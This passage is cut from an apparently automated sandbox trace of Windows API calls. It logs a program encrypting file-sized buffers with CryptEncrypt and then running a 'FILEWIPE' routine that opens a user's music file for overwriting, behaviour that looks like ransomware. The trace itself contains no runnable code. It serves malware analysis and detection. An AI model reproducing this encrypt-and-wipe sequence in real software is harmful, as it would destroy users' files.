(HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0186.107] CryptEncrypt (in: hKey=0x90af18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0xb998, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0xb9a0) returned 1 [0186.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0186.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0186.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0f0 [0186.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0186.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0186.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0186.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2868 [0186.108] CharLowerBuffW (in: lpsz="byte[47521]", cchLength=0xb | out: lpsz="byte[47521]") returned 0xb [0186.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc168 [0186.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0186.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0186.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0186.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0186.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0186.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0186.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0186.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0186.111] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0186.112] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0186.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0186.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0186.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0186.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0186.112] CryptEncrypt (in: hKey=0x90af18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xa5f008*, pdwDataLen=0x87e820*=0xb998, dwBufLen=0xb9a0 | out: pbData=0xa5f008*, pdwDataLen=0x87e820*=0xb9a0) returned 1 [0186.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0186.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0186.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def60 [0186.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0186.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0186.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0186.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0186.115] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0186.115] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0186.115] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0186.143] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0186.143] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0186.143] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0186.143] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0186.143] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0186.143] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0186.143] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0186.143] CryptDestroyKey (hKey=0x90af18) returned 1 [0186.144] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0186.144] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0186.144] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0186.144] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0186.144] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0186.144] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0186.144] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0186.144] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0186.144] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0186.144] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0186.144] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0186.144] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0186.144] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0186.144] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0186.144] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0186.144] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0186.144] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0186.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0186.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0186.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0186.145] CryptReleaseContext (hProv=0x9c0c88, dwFlags=0x0) returned 1 [0186.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0186.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0186.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9fb8 [0186.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0186.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0186.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0186.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0186.145] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0186.145] FreeLibrary (hLibModule=0x74f20000) returned 1 [0186.150] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0186.150] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\pKoP0.mp3", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf51d2450, ftCreationTime.dwHighDateTime=0x1d5dd69, ftLastAccessTime.dwLowDateTime=0xc396bae0, ftLastAccessTime.dwHighDateTime=0x1d5d8a0, ftLastWriteTime.dwLowDateTime=0xc396bae0, ftLastWriteTime.dwHighDateTime=0x1d5d8a0, nFileSizeHigh=0x0, nFileSizeLow=0xb998, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="pKoP0.mp3", cAlternateFileName="")) returned 0x90af58 [0186.151] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0186.151] CharLowerBuffW (in: lpsz="byte[47512]", cchLength=0xb | out: lpsz="byte[47512]") returned 0xb [0186.151] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc1c8 [0186.151] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0186.151] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0186.151] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0186.151] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0186.151] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0186.151] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0186.151] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0186.151] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0186.152] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0186.152] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0186.152] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0186.152] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0186.153] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0186.153] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0186.153] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0186.153] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0186.153] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x7) returned 0x9c27f8 [0186.153] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x9c27f8, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memset", lpUsedDefaultChar=0x0) returned 7 [0186.153] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0186.153] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0186.153] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0186.153] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0186.153] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0186.153] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0186.153] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0186.153] FreeLibrary (hLibModule=0x75c90000) returned 1 [0186.153] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0186.154] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0186.154] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0186.154] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0186.154] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0186.154] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0186.154] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0186.154] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0186.154] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0186.154] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0186.154] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba420 [0186.154] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x9ba420, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0186.154] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\pKoP0.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\rwwrmzhuo4\\egffoaa4l\\pkop0.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x120 [0186.155] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0186.155] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0186.155] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0186.155] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0186.155] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0186.155] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0186.155] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0186.155] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0186.155] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0186.155] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0186.155] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0186.155] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0186.155] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0186.155] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0186.155] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0186.155] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc0) returned 0x9c3478 [0186.155] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbd59a8 | out: hHeap=0x8a0000) returned 1 [0186.155] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0186.155] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0186.155] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0186.155] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0186.155] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0186.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0186.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0186.156] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0186.156] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0186.156] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0186.156] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0186.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0186.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0186.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0186.156] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0186.156] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0186.156] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0186.156] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0186.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0186.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0186.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0186.156] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0186.156] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0186.156] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0186.156] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0186.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0186.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0186.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0186.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0186.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0186.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0186.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0186.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0186.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0186.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0186.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0186.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0186.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0186.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0186.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0186.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0186.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0186.157] FreeLibrary (hLibModule=0x75990000) returned 1 [0186.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0186.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0186.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0186.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0186.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0186.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0186.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0186.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0186.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0186.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0186.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0186.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0186.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0186.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0186.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0186.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0186.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0186.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0186.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0186.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0186.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0186.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0186.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0186.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0186.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0186.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0186.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0186.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0186.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0186.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0186.159] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0186.159] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0186.159] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0186.159] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0186.159] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0186.159] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0186.159] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0186.159] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0186.159] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c88 | out: hHeap=0x8a0000) returned 1 [0186.159] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0186.159] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0186.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0186.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0186.159] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0186.159] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0186.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0186.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0186.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0186.159] 